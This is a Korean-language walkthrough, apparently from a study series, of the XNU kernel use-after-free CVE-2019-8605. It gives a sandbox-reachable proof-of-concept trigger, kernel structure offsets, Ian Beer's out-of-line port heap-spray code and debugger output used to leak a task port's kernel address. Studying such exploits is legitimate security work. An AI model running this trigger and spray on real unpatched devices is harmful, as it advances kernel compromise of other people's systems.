Case-insensitive search for in6_pcbdetach in XNU version 4903.221.2\n bsd\/netinet6\/udp6_usrreq.c\t689: in6_pcbdetach(inp);\n894: in6_pcbdetach(inp);\n bsd\/netinet6\/in6_pcb.h\t101:extern void in6_pcbdetach(struct inpcb *);\n bsd\/netinet6\/in6_pcb.c\t170: in6_pcbdetach(inp);\n631: in6_pcbdetach(inp);\n635:in6_pcbdetach(struct inpcb *inp) definition\n bsd\/netinet6\/raw_ip6.c\t829: in6_pcbdetach(inp);\n bsd\/netinet\/udp_usrreq.c\t2477: in6_pcbdetach(inp);\n bsd\/netinet\/tcp_usrreq.c\t2701: in6_pcbdetach(inp);\n bsd\/netinet\/raw_ip.c\t1071: in6_pcbdetach(inp);\n bsd\/netinet\/tcp_timer.c\t613: in6_pcbdetach(inp);\n658: in6_pcbdetach(inp);\n bsd\/netinet\/flow_divert.c\t2694: in6_pcbdetach(inp);\n bsd\/netinet\/tcp_subr.c\t1591: in6_pcbdetach(inp);\n\nvoid\nin6_pcbdetach(struct inpcb *inp);\nbsd\/netinet6\/in6_pcb.c\t681: ip6_freepcbopts(inp->in6p_outputopts);\n\nbsd\/netinet6\/ip6_output.c\t3345:ip6_freepcbopts(struct ip6_pktopts *pktopt) definition\n<\/code><\/pre>\n\ub2e4\uc2dc \ub3cc\uc544\uc640\uc11c\u2026<\/p>\n
\uc5ec\uae30\uc11c \ubb38\uc81c\ub294 inp->in6p_outputopts<\/code> \uac00 \ud574\uc81c\ub418\uc9c0\ub9cc NULL\ub85c \uc124\uc815\ub418\uc9c0 \uc54a\uc544 \ud3ec\uc778\ud130\uac00 \uc7ac\uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4\ub294 \uac83\uc774\ub2e4.<\/p>\n\uc18c\ucf13\uc744 \ud30c\uad34\ud558\uc9c0 \uc54a\uace0 \uc5f0\uacb0\uc744 \ub04a\uc73c\uba74 \uc774 \uc870\uac74\uc5d0 \ub3c4\ub2ec\ud560 \uc218 \uc788\ub2e4\uace0 \ucd94\uac00\uc801\uc73c\ub85c \uc124\uba85\ub418\uc5c8\ub2e4.<\/p>\n
\uac1c\ub150 \uc99d\uba85 \ucf54\ub4dc<\/h2>\n
\uc0cc\ub4dc\ubc15\uc2a4 \ub0b4\uc5d0\uc11c \ub2e4\uc74c PoC\uac00 \uc801\uc6a9\ub41c\ub2e4.<\/p>\n
while (1) {\n int s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);\n\n \/\/ \uc5f0\uacb0\uc744 \ub04a\uc740 \ud6c4 (\uadf8\ub9ac\uace0 \uc18c\ucf13 \uc635\uc158\uc744 \ud574\uc81c\ud55c \ud6c4) setsockopt \ud5c8\uc6a9\n struct so_np_extensions sonpx = {\n .npx_flags = SONPX_SETOPTSHUT,\n .npx_mask = SONPX_SETOPTSHUT\n };\n setsockopt(s, SOL_SOCKET, SO_NP_EXTENSIONS, &sonpx, sizeof(sonpx));\n\n int minmtu = -1;\n setsockopt(s, IPPROTO_IPV6, IPV6_USE_MIN_MTU, &minmtu, sizeof(minmtu)); \/\/ in6p_outputops \ud560\ub2f9\n disconnectx(s, 0, 0); \/\/ in6p_outputopts \ud574\uc81c\n **setsockopt(s, IPPROTO_IPV6, IPV6_USE_MIN_MTU, &minmtu, sizeof(minmtu)); \/\/ UAF \ubc1c\uc0dd**\n close(s);\n}\n\n<\/code><\/pre>\nExploit<\/h1>\n1. Dangling ptr\uc744 \ud65c\uc6a9\ud55c task port \uc720\ucd9c<\/h2>\n
\uc774\uc81c \ubc84\uadf8\uc640 \ud2b8\ub9ac\uac70 \ubc29\ubc95\uc744 \uc54c\uc558\uc73c\ub2c8 \uc775\uc2a4\ud50c\ub85c\uc787\uc73c\ub85c \ub118\uc5b4\uac00\ubcf4\uc790.<\/p>\n
\uc774\uac83\uc740 UAF \ubc84\uadf8\uc774\ubbc0\ub85c "\ud799 \uc2a4\ud504\ub808\uc774"\ub77c\ub294 \uae30\uc220\uc774 \uc0ac\uc6a9\ub41c\ub2e4.<\/p>\n
UAF\ub41c \uac1d\uccb4\ub294 \ud574\uc81c\ub418\uc5c8\ub294\ub370, \ud574\uc81c\ub41c \uba54\ubaa8\ub9ac\uc640 \ud574\uc81c\ub418\uc9c0 \uc54a\uc740 \uba54\ubaa8\ub9ac\uc758 \ucc28\uc774\ub294\u2026 \ubb34\uc5c7\uc77c\uae4c?<\/p>\n
\ud574\uc81c\ub41c \uba54\ubaa8\ub9ac\ub294 \uc7ac\uc0ac\uc6a9\ub420 \uc218 \uc788\ub2e4. \ub2e4\uc74c \ud560\ub2f9\uc774 \ud574\uc81c\ub41c \uac1d\uccb4\uac00 \uc788\ub358 \ub3d9\uc77c\ud55c \uc8fc\uc18c\uc5d0 \ub05d\ub0a0 \uac00\ub2a5\uc131\uc774 \uc788\uc73c\uba70, \uc774\ub7f0 \uc2dd\uc73c\ub85c \ud574\ub2f9 \uac1d\uccb4\uc758 \ub370\uc774\ud130\ub97c \uc81c\uc5b4\ud560 \uc218 \uc788\ub2e4.<\/p>\n
\uc774\uc81c \ub5a0\uc624\ub974\ub294 \uc9c8\ubb38\uc740:<\/p>\n
\n- \n
\ucee4\ub110\uc5d0\uac8c \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\ub77c\uace0 \uc5b4\ub5bb\uac8c \uc9c0\uc2dc\ud558\ub098?<\/p>\n<\/li>\n
- \n
\uc5b4\ub5bb\uac8c \ub3d9\uc77c\ud55c \uc8fc\uc18c\uc5d0 \ub05d\ub098\ub294\uc9c0 \ud655\uc778\ud560 \uc218 \uc788\ub098?<\/p>\n<\/li>\n<\/ol>\n
\ud799\uc2a4\ud504\ub808\uc774.<\/p>\n
\ub370\uc774\ud130\uac00 \uc5b4\ub514\ub85c \uac00\ub294\uc9c0 \uc81c\uc5b4\ud560 \uc218 \uc5c6\uae30 \ub54c\ubb38\uc5d0 \ub9ce\uc740 \ud560\ub2f9\uc744 \ud558\uace0\n\uc6b0\ub9ac\uac00 \uc6d0\ud558\ub294 \uacf3\uc5d0 \ub3c4\ucc29\ud558\uae30\ub97c \uae30\ub2e4\ub9b0\ub2e4\u2026<\/p>\n
\uadf8\uac83\uc774 \ub3c4\ucc29\ud588\ub294\uc9c0 \uc5b4\ub5bb\uac8c \ud655\uc778\ud558\ub294\uc9c0\ub294 \uc6b0\ub9ac\uac00 UAF\ud55c \uac1d\uccb4\uc5d0 \ub530\ub77c \ub2e4\ub974\uc9c0\ub9cc,\n\uc774 \uacbd\uc6b0\uc5d0\ub294 \uac00\ub2a5\ud558\uba70 \ub9e4\uc6b0 \uac04\ub2e8\ud558\ub2e4.<\/p>\n
\n- \uc5b4\ub5a4 \ub370\uc774\ud130\ub97c \ub123\uc5b4\uc57c \ud558\ub098?<\/li>\n<\/ol>\n
IOSurface\ub098 mach \uba54\uc2dc\uc9c0\uc640 \uac19\uc740 \uc5ec\ub7ec \uac00\uc9c0 \ubc29\ubc95\uc774 \uc874\uc7ac\ud55c\ub2e4.<\/strong><\/p>\n(\ucc38\uace0: \ucee4\ub110 \uba54\ubaa8\ub9ac\ub294 \ud560\ub2f9 \ud06c\uae30\uc5d0 \ub530\ub77c \uc601\uc5ed\uc73c\ub85c \uad6c\uc131\ub418\ubbc0\ub85c, \uc6b0\ub9ac\uac00 \ub9cc\ub4dc\ub294 \ud560\ub2f9\uc740 UAF\ub41c \uac1d\uccb4\uc640 \ub3d9\uc77c\ud55c \ud06c\uae30\uc5ec\uc57c \ub3d9\uc77c\ud55c \uc8fc\uc18c\uc5d0 \ub05d\ub0a0 \uc218 \uc788\uc74c. \uc774\uc5d0 \ub300\ud55c \uc790\uc138\ud55c \ub0b4\uc6a9\uc740 \ub098\uc911\uc5d0 \uc124\uba85).<\/p>\n
IOSurface\ub294 \uadf8\ub798\ud53d\uc5d0 \uc0ac\uc6a9\ub418\ub294 \ucee4\ub110 \ud655\uc7a5\uc73c\ub85c, \uc0cc\ub4dc\ubc15\uc2a4\uc5d0\uc11c \uc811\uadfc \uac00\ub2a5\ud558\uba70 \uc0ac\uc6a9\uc790 \uc815\uc758 \ud06c\uae30\uc758 \ub370\uc774\ud130\ub97c \ucee4\ub110\ub85c \uac00\uc838\uc62c \uc218 \uc788\ub294 \uba54\uc11c\ub4dc\ub97c \uc81c\uacf5\ud55c\ub2e4.<\/p>\n
Mach \uba54\uc2dc\uc9c0\ub294 \ud504\ub85c\uc138\uc2a4 \uac04 \ud1b5\uc2e0\uc5d0 \uc0ac\uc6a9\ub418\uc9c0\ub9cc, \ucee4\ub110\uc774 \ubaa8\ub4e0 \ud504\ub85c\uc138\uc2a4\ub97c \uad00\ub9ac\ud558\ubbc0\ub85c \ub370\uc774\ud130\ub97c \uba3c\uc800 \ucee4\ub110\ub85c \ubcf4\ub0b8\ub2e4. \ub530\ub77c\uc11c \uc774 \ubc29\ubc95\uc744 \uc0ac\uc6a9\ud558\uc5ec \ub370\uc774\ud130\ub97c \ucee4\ub110\ub85c \ubcf4\ub0b4\ub294\uac8c \uac00\ub2a5\ud558\ub2e4.<\/strong><\/p>\n\uba3c\uc800 \ub315\uae00\ub9c1 \ud3ec\uc778\ud130\uc778 inp->in6p_outputopts<\/code> \uac00 \ubb54\uc9c0 \uc0b4\ud3b4\ubcf4\uc790<\/p>\n\ud0c0\uc785\uc740 struct ip6_pktopts *<\/code> \uc774\ub2e4.<\/p>\nvoid ip6_freepcbopts(struct ip6_pktopts *);\n<\/code><\/pre>\nproc \uad6c\uc870\uccb4\uc5d0\uc11c \ub3c4\ub2ec\ud558\ub294 \ubc29\ubc95\uc740 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n
our proc struct \n-> struct filedesc (named p_fd, offset = 0x100 or 0x108 on iOS 11) \n-> struct fileproc array (named fd_ofiles, offset = 0) \n-> \uc18c\ucf13 \ud30c\uc77c \ub514\uc2a4\ud06c\ub9bd\ud130\ub97c \uc778\ub371\uc2a4\ub85c \ud558\ub294 \uc694\uc18c \n-> struct fileglob (named f_fglob, offset = 8) \n-> struct socket (named fg_data, offset = 56) \n-> struct inpcb (named so_pcb, offset = 16) \n-> struct ip6_pktopts (named inp6_outputopts, offset = 304). \n<\/code><\/pre>\n\uc774\uc81c "struct ip6_pktopts<\/code>"\ub97c \uc0b4\ud3b4\ubcf4\uba74,<\/p>\nstruct ip6_pktopts {\n struct mbuf *ip6po_m;\n int ip6po_hlim;\n **struct in6_pktinfo *ip6po_pktinfo;**\n struct ip6po_nhinfo ip6po_nhinfo;\n struct ip6_hbh *ip6po_hbh;\n struct ip6_dest *ip6po_dest1;\n struct ip6po_rhinfo ip6po_rhinfo;\n struct ip6_dest *ip6po_dest2;\n **int ip6po_tclass;**\n **int ip6po_minmtu;**\n **int ip6po_prefer_tempaddr;**\n int ip6po_flags;\n};\n<\/code><\/pre>\n\uc5ec\uae30\uc5d0\uc11c **get\/setsockopt<\/code>**\ub97c \uc0ac\uc6a9\ud558\uc5ec<\/p>\nip6po_pktinfo<\/code><\/p>\nip6po_tclass<\/code><\/p>\nip6po_minmtu<\/code><\/p>\nip6po_prefer_tempaddr<\/code><\/p>\n\ud544\ub4dc\ub97c \uc81c\uc5b4\ud560 \uc218 \uc788\ub2e4\uace0 \ud55c\ub2e4.<\/p>\n
\ucde8\uc57d\uc810\uc744 \uc0ac\uc6a9\ud558\uc5ec \uc6d0\ud560 \ub54c\ub9c8\ub2e4 \uc774 \uad6c\uc870\uccb4\ub97c \ud574\uc81c\ud558\uace0,\n\ud799 \uc2a4\ud504\ub808\uc774\ub97c \uc0ac\uc6a9\ud558\uc5ec \uc6d0\ud558\ub294 \ub0b4\uc6a9\uc73c\ub85c \ud560\ub2f9\ud560 \uc218 \uc788\ub2e4\ub294 \uac83\uc744 \ub2e4\uc2dc\ud55c\ubc88 \uc0c1\uae30\ud558\uc790.<\/p>\n
\uc6b0\ub9ac\uac00 \uba3c\uc800 \ud560 \uc218 \uc788\ub294 \ud55c \uac00\uc9c0\ub294 data leak\uc774\ub2e4.<\/p>\n
int ip6po_minmtu;<\/code><\/p>\nint ip6po_prefer_tempaddr;<\/code><\/p>\n\uc640 \uac19\uc740 \uc815\uc218\ub97c \uc77d\uc744 \uc218 \uc788\ub2e4.<\/p>\n
\uc774\ub97c \ud1b5\ud574 \uc6b0\ub9ac \ud0dc\uc2a4\ud06c \ud3ec\ud2b8\uc758 \ucee4\ub110 \uc8fc\uc18c\ub97c \uc720\ucd9c\ud560 \uc218 \uc788\ub2e4.<\/p>\n
\uc5b4\ub5bb\uac8c \ud558\uba74 \uac00\ub2a5\ud560\uae4c?\nOOL \uba54\uc2dc\uc9c0\ub97c \ud65c\uc6a9\ud55c Ian Beer\uc758 \uac04\ub2e8\ud55c \uc2a4\ud504\ub808\uc774 \uae30\ubc95\uc744 \uc0ac\uc6a9\ud55c\ub2e4.<\/p>\n
OOL \uba54\uc2dc\uc9c0\ub294 XNU\uc758 \ud504\ub85c\uc138\uc2a4 \uac04 \ud1b5\uc2e0(IPC) \uba54\ucee4\ub2c8\uc998\uc5d0 \uc911\uc694\ud558\uac8c \uc4f0\uc774\uae30\ub3c4 \ud558\uba70,\n\uba54\uc2dc\uc9c0\ub97c \uc218\uc2e0\ud558\uae30 \uc804\uae4c\uc9c0 \uacc4\uc18d \ucee4\ub110 \uacf5\uac04\uc5d0 \ub0a8\uc544\ub450\uac8c \ub9cc\ub4e4 \uc218 \uc788\ub2e4.<\/p>\n
https:\/\/dmcyk.xyz\/post\/xnu_ipc_iii_ool_data\/<\/a><\/p>\n\uc5ec\uae30\uc11c \uad00\uc2ec \uc788\ub294 \uac1d\uccb4, \uc608\ub97c \ub4e4\uc5b4 \ud3ec\ud2b8 \uad8c\ud55c(port right)<\/strong> \u2014 \uc744 \uc120\ud0dd\ud558\uace0,\n\ud574\ub2f9 \ud3ec\ud2b8 \uad8c\ud55c\uc744 \uc5ec\ub7ec \ubc88 \ubcf5\uc0ac\ud55c OOL(Out-Of-Line) \ub514\uc2a4\ud06c\ub9bd\ud130<\/strong>\uac00 \ud3ec\ud568\ub41c Mach \uba54\uc2dc\uc9c0\ub97c \uc900\ube44\ud55c\ub2e4.<\/p>\n\uc55e\uc11c \ubcf8 \uae30\uc220\uc744 \uc0ac\uc6a9\ud574 \uc774 \uba54\uc2dc\uc9c0\ub97c \ub2e4\ub978 \uc784\uc2dc \ud3ec\ud2b8(ephemeral port)<\/strong> \ub85c \uc804\uc1a1\ud558\uba74,\n\uacb0\uacfc\uc801\uc73c\ub85c \ud3ec\ud2b8 \ub514\uc2a4\ud06c\ub9bd\ud130\uac00 kalloc<\/code> \uc874\uc5d0 \uc5ec\ub7ec \ubc88 \ubcf5\uc0ac\ub418\uac8c \ub41c\ub2e4.<\/p>\n\ucf54\ub4dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n
\/\/ from Ian Beer. make a kernel allocation with the kernel address of 'target_port', 'count' times\nmach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) {\n mach_port_t q = MACH_PORT_NULL;\n kern_return_t err;\n err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);\n if (err != KERN_SUCCESS) {\n printf("[-] failed to allocate port\\n");\n return 0;\n }\n \n mach_port_t* ports = malloc(sizeof(mach_port_t) * count);\n for (int i = 0; i < count; i++) {\n ports[i] = target_port;\n }\n \n struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg));\n \n msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);\n msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg);\n msg->hdr.msgh_remote_port = q;\n msg->hdr.msgh_local_port = MACH_PORT_NULL;\n msg->hdr.msgh_id = 0x41414141;\n \n msg->body.msgh_descriptor_count = 1;\n \n msg->ool_ports.address = ports;\n msg->ool_ports.count = count;\n msg->ool_ports.deallocate = 0;\n msg->ool_ports.disposition = disposition;\n msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;\n msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY;\n \n err = mach_msg(&msg->hdr,\n MACH_SEND_MSG|MACH_MSG_OPTION_NONE,\n msg->hdr.msgh_size,\n 0,\n MACH_PORT_NULL,\n MACH_MSG_TIMEOUT_NONE,\n MACH_PORT_NULL);\n \n if (err != KERN_SUCCESS) {\n printf("[-] failed to send message: %s\\n", mach_error_string(err));\n return MACH_PORT_NULL;\n }\n \n return q;\n}\n<\/code><\/pre>\n\uc704 \ucf54\ub4dc\uc5d0\uc11c \uc8fc\ubaa9\ud560 \uc810\uc740, \uba54\uc2dc\uc9c0\uac00 \uc804\uc1a1(MACH_SEND_MSG)<\/strong> \ub418\uc9c0\ub9cc \uc218\uc2e0\ub418\uc9c0\ub294 \uc54a\ub294\ub2e4<\/strong>\ub294 \uc810\uc774\ub2e4.<\/p>\n\uc774\ub807\uac8c \ud558\uba74 \uba54\uc2dc\uc9c0\uac00 \uc218\uc2e0\ub418\uac70\ub098, \uba54\uc2dc\uc9c0\uc758 \ub300\uc0c1 \ud3ec\ud2b8\uac00 \ud30c\uad34\ub418\uae30 \uc804\uae4c\uc9c0\ub294 \ud3ec\ud2b8 \uc2a4\ud504\ub808\uc774\uac00 \ucee4\ub110 \uacf5\uac04\uc5d0 \ub0a8\uc544 \uc788\uac8c<\/strong> \ub41c\ub2e4.<\/p>\n\uc774 \ub54c\ubb38\uc5d0 \uc2a4\ud504\ub808\uc774 \ud568\uc218\ub294 \ub300\uc0c1 \ud3ec\ud2b8(target port)<\/strong> \ub97c \ubc18\ud658\ud55c\ub2e4. \ucee4\ub110 \ub0b4\ubd80\uc5d0\uc11c \ubcf5\uc0ac\uac00 \uc644\ub8cc\ub41c \ud6c4, \ud574\ub2f9 \ud3ec\ud2b8\ub97c \uace7\ubc14\ub85c \ud574\uc81c\ud558\uace0, \uc8fc\uc18c \uc720\ucd9c\uc744 \uc2dc\ub3c4\ud55c\ub2e4.<\/p>\n\ucee4\ub110 \uc874(zone)\uc758 \ud3ec\uc778\ud130\ub294 \ud56d\uc0c1 0xffffff8.........<\/code> \ud615\ud0dc\ub97c \ub748\ub2e4\u2026 \ub530\ub77c\uc11c \uc720\ucd9c\ub41c \uc8fc\uc18c\uac00 8\ubc14\uc774\ud2b8 \uc911 \uc0c1\uc704 1\ubc14\uc774\ud2b8\uac00 0<\/strong>\uc77c\uc9c0\ub77c\ub3c4(\uc989, 7\ubc14\uc774\ud2b8\ub9cc \uc720\ucd9c\ub418\ub354\ub77c\ub3c4<\/strong>), \ud574\ub2f9 \uac12\uc774 \ucee4\ub110 \ud3ec\uc778\ud130\ub77c\ub294 \uac83\uc744 \uc54c\uc544\ubcfc \uc218 \uc788\ub2e4.<\/p>\n\uc608\uc2dc\ub85c \uc544\ub798 \ucf54\ub4dc\ub97c \uc2e4\ud589\uc2dc\ucf1c\uc11c \ub514\ubc84\uae45\ud574\uc11c \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n
int main(int argc, char *argv[], char *envp[]) {\n\n mach_port_t p = fill_kalloc_with_port_pointer(mach_task_self(), 192\/sizeof(uint64_t), MACH_MSG_TYPE_COPY_SEND);\n printf("p: 0x%x\\n", p);\n while(1) {};\n\n return 0;\n}\n<\/code><\/pre>\n\uc6b0\uc120\uc740 \uc800 192\ud06c\uae30\ub9cc\ud07c kalloc\uc744 \uc218\ud589\ud558\ub294\uacf3\uc740\n\ub0b4\ubd80\uc801\uc73c\ub85c ipc_kmsg_copyin_ool_ports_descriptor<\/code> \ud568\uc218\uc5d0\uc11c \ud638\ucd9c\ub41c\ub2e4.<\/p>\nQEMU\ub85c \ub514\ubc84\uae45\ud558\ub294\ub370.\n\uac00\uc0c1 \ud638\uc2a4\ud2b8\ub9e5\uc5d0\uc11c lldb\uc640 \uc6b0\ubd84\ud22c\uc5d0\uc11c gdb-gef \ub3d9\uc2dc\uc5d0 \ud63c\uc6a9\ud574\uc11c \ub514\ubc84\uae45\ud560 \ud544\uc694\uac00 \uc788\uc5c8\ub2e4.<\/p>\n
Target 0: (kernel) stopped.\n(lldb) p\/x ipc_kmsg_copyin_ool_ports_descriptor\n(mach_msg_descriptor_t *(*)(mach_msg_ool_ports_descriptor_t *, mach_msg_descriptor_t *, int, vm_map_t, ipc_space_t, ipc_object_t, ipc_kmsg_t, mach_msg_option_t *, mach_msg_return_t *)) $0 = 0xffffff801778df60 (kernel`ipc_kmsg_copyin_ool_ports_descriptor at ipc_kmsg.c:2810)\n\n# ipc_kmsg_copyin_ool_ports_descriptor \ud568\uc218 \uc8fc\uc18c\ub294 0xffffff801778df60 \n# \ub0b4\ubd80\uc801\uc73c\ub85c kalloc\uc774 ipc_kmsg_copyin_ool_ports_descriptor+0xe9\uc5d0\uc11c call \ub428.\n# \ube0c\ud3ec\ub97c \uac80\ngef> b *0xffffff801778df60+0xe9\nBreakpoint 2 at 0xffffff801778e049\n\n# kalloc \ud560\ub2f9 \uc8fc\uc18c\ub294 ipc_kmsg_copyin_ool_ports_descriptor+0xee, \uc989 call \ubc14\ub85c \uc9c1\ud6c4\uc5d0 \ube0c\ud3ec\ub97c \uac78\uc5b4 \ud655\uc778\ngef> b *0xffffff801778df60+0xee\nBreakpoint 3 at 0xffffff801778e04e\n<\/code><\/pre>\n\uc704\uc640 \uac19\uc740 \uc870\uae08 \uae4c\ub2e4\ub85c\uc6b4 \ubc29\ubc95\uc73c\ub85c \ub514\ubc84\uae45\ud558\ub2e4\ubcf4\uba74, kalloc \ud568\uc218 \ud638\ucd9c\ud558\ub294\ub370\uc5d0\uc11c<\/p>\n
<\/p>\n
0xc0(=192) \ud06c\uae30\ub97c \ud560\ub2f9\ud558\ub294 \ubaa8\uc2b5\uc744 \ubcfc \uc218 \uc788\uc744\ud150\ub370,<\/p>\n
<\/p>\n
\ud560\ub2f9\ub41c \uc8fc\uc18c\ub294 0xffffff801f79a540\uc774\ub2e4.<\/p>\n
\uc774\ud6c4 \uacc4\uc18d \uc2e4\ud589\uc2dc\ud0a4\uace0 \ub2e4\uc2dc \ud560\ub2f9\uc8fc\uc18c\ub97c \ud655\uc778\ud574\ubcf4\uba74,<\/p>\n
<\/p>\n
\uc704\uc640 \uac19\uc740 \uac12\uc774 \uc5f0\uc18d\uc801\uc73c\ub85c \ucc44\uc6cc\uc9c4\uac83\uc744 \ubcfc \uc218 \uc788\ub2e4.\n\uc774\uac83\uc774 \ubc14\ub85c \uc6b0\ub9ac \ud504\ub85c\uc138\uc2a4\uc758 task \uc8fc\uc18c\uc774\ub2e4.<\/p>\n
![\"image.png\"](\"https:\/\/raw.githubusercontent.com\/wh1te4ever\/xnu_1day_practice\/refs\/heads\/main\/CVE-2019-8605\/pics\/image%203.png\")
<\/p>\n![\"image.png\"](\"https:\/\/raw.githubusercontent.com\/wh1te4ever\/xnu_1day_practice\/refs\/heads\/main\/CVE-2019-8605\/pics\/image%204.png\")
<\/p>\n